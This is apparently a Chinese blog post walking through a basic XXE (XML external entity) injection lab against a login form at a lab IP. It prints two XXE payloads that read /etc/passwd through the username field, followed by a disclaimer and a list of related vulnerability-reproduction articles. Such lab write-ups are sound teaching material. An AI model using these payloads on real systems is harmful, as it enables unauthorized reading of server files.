文章目录

  • XXE-基础实验
    • 实验内容
    • 实验步骤
      • 1.访问目标进行注入攻击
      • 2.尝试进行登录,并进行抓包
      • 3.根据xxe注入漏洞,构造payloa
    • 免责声明

XXE-基础实验

实验内容

XXE(XML注入)

实验步骤

1.访问目标进行注入攻击

访问目标IP:172.16.12.2,看到以下页面

2.尝试进行登录,并进行抓包

在数据包中发送的用户名/密码是以post形式发送的,并且格式很像xml文档

3.根据xxe注入漏洞,构造payloa

只需将payload输出在username里面就行

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY whoami SYSTEM "file:///etc//passwd">
]>
<user><username>&whoami;</username><password>123.com</password>
</user>

payload

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root> <username>&sp;</username><password>123.com</password>
</root>

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

漏洞复现之xxe漏洞相关推荐

  1. java 漏洞挖掘_Java XXE漏洞典型场景分析

    本文首发于oppo安全应急响应中心: 0x01 前言: XML 的解析过程中若存在外部实体,若不添加安全的XML解析配置,则XML文档将包含来自外部 URI 的数据.这一行为将导致XML Extern ...

  2. Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

    环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...

  3. php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...

    nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...

  4. CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现

    全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地 ...

  5. 【漏洞复现】MS12-020漏洞(蓝屏攻击)复现

    实验准备:win7(192.168.217.156),kali 实验步骤: 漏洞复现 打开windows远程桌面 方法:计算机–属性–远程设置 用kali查看win7已打开的端口,可以看到3389远程 ...

  6. 【漏洞复现】MS17-010漏洞(永恒之蓝)复现

    永恒之蓝漏洞复现 漏洞复现 对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接 实验准备:win7 (192.168.217.153).win10.kali.Xshell 实验步骤: 漏洞 ...

  7. sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 漏洞复现专栏:https://blog.csdn.net ...

  8. 【漏洞复现】CVE-2020-0796漏洞复现(win10系统)

    前言: Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统 ...

  9. 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复

    20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...

最新文章

  1. c语言 北京时间转换utc时间_mysql之unix时间戳和正常时间格式之间的转换
  2. [android] 练习使用ListView(一)
  3. springmvc教程--注解开发基础详解
  4. 物联网是互联网发展的必然趋势吗?
  5. 本地服务器的音乐如何才能播放视频文件夹,mx播放器如何添加本地文件 添加本地文件设置方法...
  6. 余额宝上线新功能,可以跟亲朋好友一起攒钱了
  7. android studio 预览问题 :java.lang.NoClassDefFoundError: com/android/util/PropertiesMap
  8. mysql三表联合更新_mysql三表连接update
  9. .gitignore忽略文件提交服务器
  10. python获取当前时间的源代码_python怎么获取当前系统时间
  11. 四 Lync Server 2013 部署指南-前端部署(1)
  12. [BZOJ]1003 物流运输(ZJOI2006)
  13. 关于git远程分支操作
  14. 百度百科爬虫爬人物信息
  15. 做软件测试有发展前景吗?
  16. 配备透明触摸屏 看3D全息投影概念手机
  17. 软考高级-信息系统管理师之质量管理(最新版)
  18. ctab法提取dna流程图_(完整版)CTAB法提取DNA原理及步骤、制胶、电泳
  19. 那些年啊,那些事——一个程序员的奋斗史 ——32
  20. 使用tkinter加载png、jpg等图片

热门文章

  1. activiti并行网关(Parallel Gateway)
  2. 学习记录605@flowable之moveExecutionsToSingleActivityId并行网关或者包容网关回退
  3. 数据分析成果落地难?你需要注意这五个问题
  4. App数据分析的五大维度!
  5. OC基础----查看苹果帮助文档
  6. python中math计算平方根的函数_Python中Numpy和Math常用函数性能对比
  7. hibernate 时间模糊查询时间
  8. python中的zip函数索引_Python--zip()函数
  9. Nvidia jetson nano 配置 CUDA9 CUDNN7.1.5
  10. 聚集诱导发光(AIE)活性基团四苯乙烯修饰aza-BODIPY荧光染料